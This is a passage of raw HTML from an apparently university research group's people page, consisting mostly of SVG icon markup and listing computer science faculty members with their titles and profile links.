5.859-55.664 8.789s-38.086 8.789-55.664 14.648c-17.578 5.859-35.156 11.719-52.734 17.578-17.578 8.789-32.227 17.578-49.805 29.297-11.719 11.719-26.367 23.438-35.156 38.086-11.719 14.648-20.508 32.227-26.367 49.805s-8.789 35.156-8.789 55.664c0 20.508 2.93 38.086 8.789 55.664 2.93 14.648 11.719 32.227 23.438 46.875 8.789 14.648 20.508 29.297 32.227 38.086 14.648 11.719 29.297 23.438 43.945 29.297 14.648 8.789 29.297 17.578 46.875 23.438s32.227 11.719 49.805 14.648c20.508 5.859 38.086 8.789 52.734 8.789 20.508 2.93 38.086 2.93 52.734 2.93 38.086 0 70.313-2.93 99.609-11.719 32.227-5.859 58.594-17.578 84.961-35.156s43.945-35.156 55.664-61.523c14.648-26.367 20.508-52.734 20.508-87.891 0-5.859 0-11.719-2.93-20.508 0-5.859 0-11.719-2.93-20.508s-5.859-14.648-5.859-20.508c-2.93-5.859-5.859-11.719-5.859-14.648-2.93-5.859-5.859-11.719-8.789-17.578s-8.789-11.719-14.648-17.578c-5.859-8.789-8.789-11.719-14.648-17.578s-8.789-8.789-11.719-11.719c-2.93-2.93-5.859-5.859-11.719-11.719-2.93-5.859-11.719-11.719-17.578-17.578-8.789-8.789-14.648-11.719-20.508-17.578-5.859 2.93-8.789 0-11.719 0zM911.133 641.602c11.719-14.648 23.438-35.156 32.227-58.594s11.719-46.875 11.719-70.313c0-23.438-2.93-46.875-5.859-70.313-5.859-23.438-8.789-46.875-17.578-73.242-8.789-23.438-17.578-46.875-32.227-70.313-11.719-20.508-26.367-41.016-43.945-61.523s-38.086-35.156-58.594-43.945c-17.578-11.719-41.016-14.648-64.453-14.648-26.367 0-49.805 2.93-70.313 14.648-17.578 8.789-35.156 23.438-49.805 41.016-14.648 20.508-23.438 38.086-32.227 61.523-5.859 23.438-8.789 49.805-8.789 76.172 0 23.438 0 46.875 5.859 70.313 2.93 20.508 8.789 43.945 14.648 70.313 8.789 23.438 17.578 43.945 32.227 67.383 11.719 20.508 26.367 38.086 43.945 58.594 17.578 17.578 38.086 32.227 58.594 41.016s41.016 14.648 64.453 14.648c26.367 0 49.805-5.859 70.313-14.648 17.578-5.859 35.156-20.508 49.805-38.086z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-972-outer style-local-182-c34-outer\">\n            <div data-colibri-id=\"182-c34\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-972 style-local-182-c34 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c35\" class=\"d-block style-973 style-local-182-c35 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-bourgeois.jpeg\" class=\"wp-image-696 style-973-image style-local-182-c35-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-973-frameImage style-local-182-c35-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c36\" class=\"h-global-transition-all h-heading style-974 style-local-182-c36 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-974 style-local-182-c36\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Anu Bourgeois</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c37\" class=\"h-text h-text-component style-975 style-local-182-c37 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Professor</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c38\" class=\"h-text h-text-component style-976 style-local-182-c38 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c39\" class=\"style-977 style-local-182-c39 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/anu-bourgeois-09b7b32b/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://cas.gsu.edu/profile/anu-bourgeois/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Font Awesome (https://fontawesome.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"external-link\" viewBox=\"0 0 1792 1896.0833\">\n                              <path d=\"M1408 928v320q0 119-84.5 203.5T1120 1536H288q-119 0-203.5-84.5T0 1248V416q0-119 84.5-203.5T288 128h704q14 0 23 9t9 23v64q0 14-9 23t-23 9H288q-66 0-113 47t-47 113v832q0 66 47 113t113 47h832q66 0 113-47t47-113V928q0-14 9-23t23-9h64q14 0 23 9t9 23zm384-864v512q0 26-19 45t-45 19-45-19l-176-176-652 652q-10 10-23 10t-23-10L695 983q-10-10-10-23t10-23l652-652-176-176q-19-19-19-45t19-45 45-19h512q26 0 45 19t19 45z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://scholar.google.com/citations?user=qsAUgQ8AAAAJ&amp;hl=en\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1341.797 166.992c14.648 0 23.438 5.859 23.438 11.719 2.93 8.789 2.93 17.578 2.93 29.297v503.906c0 11.719-5.859 20.508-11.719 29.297-8.789 8.789-17.578 11.719-29.297 11.719h-17.578c-11.719 0-20.508-5.859-29.297-11.719-8.789-8.789-11.719-17.578-11.719-29.297v-503.906c0-11.719 0-20.508 0-29.297 2.93-5.859 8.789-11.719 23.438-11.719v-67.383l-219.727 181.641c2.93 2.93 2.93 5.859 5.859 5.859 0 2.93 2.93 2.93 2.93 5.859 8.789 17.578 17.578 38.086 23.438 58.594 2.93 20.508 5.859 46.875 5.859 73.242 0 20.508 0 38.086-2.93 55.664s-8.789 38.086-14.648 52.734c-8.789 14.648-14.648 29.297-23.438 43.945-8.789 11.719-17.578 23.438-26.367 32.227-8.789 11.719-20.508 20.508-29.297 29.297s-20.508 17.578-29.297 26.367c-8.789 8.789-17.578 17.578-26.367 26.367s-14.648 17.578-23.438 26.367c-5.859 8.789-11.719 17.578-14.648 26.367-2.93 11.719-2.93 20.508-2.93 29.297 0 11.719 0 20.508 5.859 29.297 2.93 8.789 8.789 20.508 20.508 29.297 8.789 8.789 17.578 20.508 29.297 29.297 8.789 8.789 20.508 20.508 35.156 29.297 11.719 8.789 26.367 17.578 38.086 29.297 11.719 8.789 26.367 20.508 38.086 32.227s23.438 23.438 35.156 38.086c11.719 17.578 20.508 32.227 29.297 49.805s14.648 38.086 17.578 55.664c5.859 20.508 8.789 41.016 8.789 61.523 0 29.297-2.93 55.664-11.719 82.031-5.859 26.367-17.578 49.805-32.227 70.313-14.648 23.438-32.227 43.945-49.805 61.523-20.508 20.508-41.016 35.156-61.523 49.805-26.367 11.719-49.805 26.367-73.242 35.156-26.367 8.789-49.805 17.578-79.102 23.438-23.438 5.859-49.805 11.719-79.102 14.648-26.367 2.93-52.734 5.859-79.102 5.859-14.648 0-32.227 0-49.805-2.93-14.648 0-32.227-2.93-49.805-5.859-14.648-2.93-32.227-5.859-49.805-8.789-17.578-5.859-35.156-11.719-49.805-17.578-17.578-5.859-35.156-11.719-49.805-20.508s-29.297-17.578-41.016-29.297c-14.648-8.789-26.367-20.508-35.156-32.227-11.719-11.719-20.508-26.367-29.297-41.016s-14.648-32.227-20.508-49.805c-2.93-14.648-5.859-32.227-5.859-52.734 0-23.438 2.93-43.945 8.789-64.453s14.648-41.016 29.297-61.523c11.719-17.578 26.367-35.156 43.945-52.734 14.648-14.648 35.156-29.297 55.664-41.016 17.578-11.719 38.086-20.508 61.523-32.227 20.508-8.789 46.875-14.648 76.172-23.438 29.297-5.859 58.594-11.719 90.82-14.648 32.227-5.859 70.313-8.789 108.398-11.719-17.578-23.438-29.297-43.945-38.086-64.453s-14.648-41.016-14.648-58.594c0-11.719 2.93-23.438 5.859-35.156s5.859-23.438 11.719-38.086c-8.789 0-17.578 2.93-29.297 2.93-8.789 0-17.578 0-26.367 0-43.945 0-79.102-5.859-114.258-17.578-35.156-14.648-67.383-32.227-93.75-61.523-29.297-26.367-49.805-58.594-64.453-90.82s-20.508-70.313-20.508-111.328c0-2.93 0-8.789 0-11.719 0-5.859 0-8.789 0-11.719h-339.844l506.836-439.453h834.961l-76.172 58.594v108.398zM922.852 1037.109c0-2.93-5.859-5.859-11.719-8.789-5.859-5.859-11.719-8.789-20.508-17.578-8.789-5.859-17.578-11.719-23.438-17.578-2.93-2.93-5.859-5.859-8.789-5.859s-8.789 0-14.648 0c-5.859 0-14.648-2.93-23.438-2.93-20.508 0-38.086 2.93-55.664 2.93-20.508 2.93-38.086 5.859-55.664 8.789s-38.086 8.789-55.664 14.648c-17.578 5.859-35.156 11.719-52.734 17.578-17.578 8.789-32.227 17.578-49.805 29.297-11.719 11.719-26.367 23.438-35.156 38.086-11.719 14.648-20.508 32.227-26.367 49.805s-8.789 35.156-8.789 55.664c0 20.508 2.93 38.086 8.789 55.664 2.93 14.648 11.719 32.227 23.438 46.875 8.789 14.648 20.508 29.297 32.227 38.086 14.648 11.719 29.297 23.438 43.945 29.297 14.648 8.789 29.297 17.578 46.875 23.438s32.227 11.719 49.805 14.648c20.508 5.859 38.086 8.789 52.734 8.789 20.508 2.93 38.086 2.93 52.734 2.93 38.086 0 70.313-2.93 99.609-11.719 32.227-5.859 58.594-17.578 84.961-35.156s43.945-35.156 55.664-61.523c14.648-26.367 20.508-52.734 20.508-87.891 0-5.859 0-11.719-2.93-20.508 0-5.859 0-11.719-2.93-20.508s-5.859-14.648-5.859-20.508c-2.93-5.859-5.859-11.719-5.859-14.648-2.93-5.859-5.859-11.719-8.789-17.578s-8.789-11.719-14.648-17.578c-5.859-8.789-8.789-11.719-14.648-17.578s-8.789-8.789-11.719-11.719c-2.93-2.93-5.859-5.859-11.719-11.719-2.93-5.859-11.719-11.719-17.578-17.578-8.789-8.789-14.648-11.719-20.508-17.578-5.859 2.93-8.789 0-11.719 0zM911.133 641.602c11.719-14.648 23.438-35.156 32.227-58.594s11.719-46.875 11.719-70.313c0-23.438-2.93-46.875-5.859-70.313-5.859-23.438-8.789-46.875-17.578-73.242-8.789-23.438-17.578-46.875-32.227-70.313-11.719-20.508-26.367-41.016-43.945-61.523s-38.086-35.156-58.594-43.945c-17.578-11.719-41.016-14.648-64.453-14.648-26.367 0-49.805 2.93-70.313 14.648-17.578 8.789-35.156 23.438-49.805 41.016-14.648 20.508-23.438 38.086-32.227 61.523-5.859 23.438-8.789 49.805-8.789 76.172 0 23.438 0 46.875 5.859 70.313 2.93 20.508 8.789 43.945 14.648 70.313 8.789 23.438 17.578 43.945 32.227 67.383 11.719 20.508 26.367 38.086 43.945 58.594 17.578 17.578 38.086 32.227 58.594 41.016s41.016 14.648 64.453 14.648c26.367 0 49.805-5.859 70.313-14.648 17.578-5.859 35.156-20.508 49.805-38.086z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-972-outer style-local-182-c40-outer\">\n            <div data-colibri-id=\"182-c40\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-972 style-local-182-c40 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c41\" class=\"d-block style-973 style-local-182-c41 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/08/hu_new-1.jpg\" class=\"wp-image-1348 style-973-image style-local-182-c41-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-973-frameImage style-local-182-c41-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c42\" class=\"h-global-transition-all h-heading style-974 style-local-182-c42 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-974 style-local-182-c42\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Xiaolin Hu</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c43\" class=\"h-text h-text-component style-975 style-local-182-c43 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Professor</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c44\" class=\"h-text h-text-component style-976 style-local-182-c44 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c45\" class=\"style-977 style-local-182-c45 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://csds.gsu.edu/profile/xiaolin-hu/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Font Awesome (https://fontawesome.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"external-link\" viewBox=\"0 0 1792 1896.0833\">\n                              <path d=\"M1408 928v320q0 119-84.5 203.5T1120 1536H288q-119 0-203.5-84.5T0 1248V416q0-119 84.5-203.5T288 128h704q14 0 23 9t9 23v64q0 14-9 23t-23 9H288q-66 0-113 47t-47 113v832q0 66 47 113t113 47h832q66 0 113-47t47-113V928q0-14 9-23t23-9h64q14 0 23 9t9 23zm384-864v512q0 26-19 45t-45 19-45-19l-176-176-652 652q-10 10-23 10t-23-10L695 983q-10-10-10-23t10-23l652-652-176-176q-19-19-19-45t19-45 45-19h512q26 0 45 19t19 45z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://scholar.google.com/citations?user=zeU19nAAAAAJ&amp;hl=en\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1341.797 166.992c14.648 0 23.438 5.859 23.438 11.719 2.93 8.789 2.93 17.578 2.93 29.297v503.906c0 11.719-5.859 20.508-11.719 29.297-8.789 8.789-17.578 11.719-29.297 11.719h-17.578c-11.719 0-20.508-5.859-29.297-11.719-8.789-8.789-11.719-17.578-11.719-29.297v-503.906c0-11.719 0-20.508 0-29.297 2.93-5.859 8.789-11.719 23.438-11.719v-67.383l-219.727 181.641c2.93 2.93 2.93 5.859 5.859 5.859 0 2.93 2.93 2.93 2.93 5.859 8.789 17.578 17.578 38.086 23.438 58.594 2.93 20.508 5.859 46.875 5.859 73.242 0 20.508 0 38.086-2.93 55.664s-8.789 38.086-14.648 52.734c-8.789 14.648-14.648 29.297-23.438 43.945-8.789 11.719-17.578 23.438-26.367 32.227-8.789 11.719-20.508 20.508-29.297 29.297s-20.508 17.578-29.297 26.367c-8.789 8.789-17.578 17.578-26.367 26.367s-14.648 17.578-23.438 26.367c-5.859 8.789-11.719 17.578-14.648 26.367-2.93 11.719-2.93 20.508-2.93 29.297 0 11.719 0 20.508 5.859 29.297 2.93 8.789 8.789 20.508 20.508 29.297 8.789 8.789 17.578 20.508 29.297 29.297 8.789 8.789 20.508 20.508 35.156 29.297 11.719 8.789 26.367 17.578 38.086 29.297 11.719 8.789 26.367 20.508 38.086 32.227s23.438 23.438 35.156 38.086c11.719 17.578 20.508 32.227 29.297 49.805s14.648 38.086 17.578 55.664c5.859 20.508 8.789 41.016 8.789 61.523 0 29.297-2.93 55.664-11.719 82.031-5.859 26.367-17.578 49.805-32.227 70.313-14.648 23.438-32.227 43.945-49.805 61.523-20.508 20.508-41.016 35.156-61.523 49.805-26.367 11.719-49.805 26.367-73.242 35.156-26.367 8.789-49.805 17.578-79.102 23.438-23.438 5.859-49.805 11.719-79.102 14.648-26.367 2.93-52.734 5.859-79.102 5.859-14.648 0-32.227 0-49.805-2.93-14.648 0-32.227-2.93-49.805-5.859-14.648-2.93-32.227-5.859-49.805-8.789-17.578-5.859-35.156-11.719-49.805-17.578-17.578-5.859-35.156-11.719-49.805-20.508s-29.297-17.578-41.016-29.297c-14.648-8.789-26.367-20.508-35.156-32.227-11.719-11.719-20.508-26.367-29.297-41.016s-14.648-32.227-20.508-49.805c-2.93-14.648-5.859-32.227-5.859-52.734 0-23.438 2.93-43.945 8.789-64.453s14.648-41.016 29.297-61.523c11.719-17.578 26.367-35.156 43.945-52.734 14.648-14.648 35.156-29.297 55.664-41.016 17.578-11.719 38.086-20.508 61.523-32.227 20.508-8.789 46.875-14.648 76.172-23.438 29.297-5.859 58.594-11.719 90.82-14.648 32.227-5.859 70.313-8.789 108.398-11.719-17.578-23.438-29.297-43.945-38.086-64.453s-14.648-41.016-14.648-58.594c0-11.719 2.93-23.438 5.859-35.156s5.859-23.438 11.719-38.086c-8.789 0-17.578 2.93-29.297 2.93-8.789 0-17.578 0-26.367 0-43.945 0-79.102-5.859-114.258-17.578-35.156-14.648-67.383-32.227-93.75-61.523-29.297-26.367-49.805-58.594-64.453-90.82s-20.508-70.313-20.508-111.328c0-2.93 0-8.789 0-11.719 0-5.859 0-8.789 0-11.719h-339.844l506.836-439.453h834.961l-76.172 58.594v108.398zM922.852 1037.109c0-2.93-5.859-5.859-11.719-8.789-5.859-5.859-11.719-8.789-20.508-17.578-8.789-5.859-17.578-11.719-23.438-17.578-2.93-2.93-5.859-5.859-8.789-5.859s-8.789 0-14.648 0c-5.859 0-14.648-2.93-23.438-2.93-20.508 0-38.086 2.93-55.664 2.93-20.508 2.93-38.086 5.859-55.664 8.789s-38.086 8.789-55.664 14.648c-17.578 5.859-35.156 11.719-52.734 17.578-17.578 8.789-32.227 17.578-49.805 29.297-11.719 11.719-26.367 23.438-35.156 38.086-11.719 14.648-20.508 32.227-26.367 49.805s-8.789 35.156-8.789 55.664c0 20.508 2.93 38.086 8.789 55.664 2.93 14.648 11.719 32.227 23.438 46.875 8.789 14.648 20.508 29.297 32.227 38.086 14.648 11.719 29.297 23.438 43.945 29.297 14.648 8.789 29.297 17.578 46.875 23.438s32.227 11.719 49.805 14.648c20.508 5.859 38.086 8.789 52.734 8.789 20.508 2.93 38.086 2.93 52.734 2.93 38.086 0 70.313-2.93 99.609-11.719 32.227-5.859 58.594-17.578 84.961-35.156s43.945-35.156 55.664-61.523c14.648-26.367 20.508-52.734 20.508-87.891 0-5.859 0-11.719-2.93-20.508 0-5.859 0-11.719-2.93-20.508s-5.859-14.648-5.859-20.508c-2.93-5.859-5.859-11.719-5.859-14.648-2.93-5.859-5.859-11.719-8.789-17.578s-8.789-11.719-14.648-17.578c-5.859-8.789-8.789-11.719-14.648-17.578s-8.789-8.789-11.719-11.719c-2.93-2.93-5.859-5.859-11.719-11.719-2.93-5.859-11.719-11.719-17.578-17.578-8.789-8.789-14.648-11.719-20.508-17.578-5.859 2.93-8.789 0-11.719 0zM911.133 641.602c11.719-14.648 23.438-35.156 32.227-58.594s11.719-46.875 11.719-70.313c0-23.438-2.93-46.875-5.859-70.313-5.859-23.438-8.789-46.875-17.578-73.242-8.789-23.438-17.578-46.875-32.227-70.313-11.719-20.508-26.367-41.016-43.945-61.523s-38.086-35.156-58.594-43.945c-17.578-11.719-41.016-14.648-64.453-14.648-26.367 0-49.805 2.93-70.313 14.648-17.578 8.789-35.156 23.438-49.805 41.016-14.648 20.508-23.438 38.086-32.227 61.523-5.859 23.438-8.789 49.805-8.789 76.172 0 23.438 0 46.875 5.859 70.313 2.93 20.508 8.789 43.945 14.648 70.313 8.789 23.438 17.578 43.945 32.227 67.383 11.719 20.508 26.367 38.086 43.945 58.594 17.578 17.578 38.086 32.227 58.594 41.016s41.016 14.648 64.453 14.648c26.367 0 49.805-5.859 70.313-14.648 17.578-5.859 35.156-20.508 49.805-38.086z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-972-outer style-local-182-c46-outer\">\n            <div data-colibri-id=\"182-c46\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-972 style-local-182-c46 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c47\" class=\"d-block style-973 style-local-182-c47 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2023/09/cropped-patterson.jpg\" class=\"wp-image-1391 style-973-image style-local-182-c47-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-973-frameImage style-local-182-c47-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c48\" class=\"h-global-transition-all h-heading style-974 style-local-182-c48 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-974 style-local-182-c48\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Murray Patterson</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c49\" class=\"h-text h-text-component style-975 style-local-182-c49 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Assistant Professor&nbsp;</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c50\" class=\"h-text h-text-component style-976 style-local-182-c50 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c51\" class=\"style-977 style-local-182-c51 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/murray-patterson-449a947\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://cas.gsu.edu/profile/murray-patterson/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Font Awesome (https://fontawesome.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"external-link\" viewBox=\"0 0 1792 1896.0833\">\n                              <path d=\"M1408 928v320q0 119-84.5 203.5T1120 1536H288q-119 0-203.5-84.5T0 1248V416q0-119 84.5-203.5T288 128h704q14 0 23 9t9 23v64q0 14-9 23t-23 9H288q-66 0-113 47t-47 113v832q0 66 47 113t113 47h832q66 0 113-47t47-113V928q0-14 9-23t23-9h64q14 0 23 9t9 23zm384-864v512q0 26-19 45t-45 19-45-19l-176-176-652 652q-10 10-23 10t-23-10L695 983q-10-10-10-23t10-23l652-652-176-176q-19-19-19-45t19-45 45-19h512q26 0 45 19t19 45z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://scholar.google.com/citations?user=X4J8vAEAAAAJ&amp;hl=en\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon 